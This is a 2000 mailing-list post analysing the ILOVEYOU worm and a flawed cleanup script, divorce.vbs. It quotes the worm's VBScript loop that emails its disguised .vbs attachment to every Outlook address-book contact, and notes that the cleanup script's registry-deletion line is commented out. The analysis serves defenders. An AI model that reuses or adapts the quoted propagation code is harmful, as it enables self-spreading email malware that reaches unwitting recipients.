Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Opportunist?

From: des () FLOOD PING UIO NO (Dag-Erling Smorgrav)
Date: Fri, 5 May 2000 16:49:10 +0200

"GALES,SIMON (Non-A-ColSprings,ex1)" <george_gales () NON HP COM> writes:

I took a quick look at it, and was wondering just what it was doing fiddling
in the MAPI address books... does the ILU worm write to the address book(s)?


No, but it loops through the address book and writes stuff to the
registry for each entry in the address book. Here's the relevant
excerpt from LOVELETTER (my indentation):

    for ctrlists=1 to mapi.AddressLists.Count
        set a=mapi.AddressLists(ctrlists)
        x=1
        regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
        if (regv="") then
            regv=1
        end if
        if (int(a.AddressEntries.Count)>int(regv)) then
            for ctrentries=1 to a.AddressEntries.Count
                malead=a.AddressEntries(x)
                regad=""
                regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
                if (regad="") then
                    set male=out.CreateItem(0)
                    male.Recipients.Add(malead)
                    male.Subject = "ILOVEYOU"
                    male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
                    male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
                    male.Send
                    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
                end if
                x=x+1
            next
            regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
        else
            regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
        end if
    next

The corresponding code in divorce.vbs is supposed to remove those
entries, but the crucial line is commented out. It looks like the
authors just cut&pasted code from LOVELETTER and changed some words
here and there to reverse the effect. Here's the relevant excerpt from
divorce.vbs (authors' indentation):

    for ctrlists=1 to mapi.AddressLists.Count
        set a=mapi.AddressLists(ctrlists)
        x=1

        if (int(a.AddressEntries.Count)>1) then

            for ctrentries=1 to a.AddressEntries.Count
                malead=a.AddressEntries(x)
                regad=""
                regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)

                    if (not regad="") then
                        log_to_disk("Deleting HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
!                       rem regedit.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead
                    end if

                x=x+1
            next

        end if
    next

The line with a bang in the margin would remove the registry entries
created by LOVELETTER, if it weren't commented out.


This script/batchfile only cleans up .vbs files, but I seem to remember
someone mentioning overwritten .js/.mp3 files among others?  Or is it just
my end-of-week fogginess?


LOVELETTER deletes mp3 etc. files, and replaces them with .vbs files
with the same name, so the offending files all end with .vbs.

DES

--
Dag-Erling Smorgrav - des () flood ping uio no
Previous By Date Next
Previous By Thread Next

Current thread: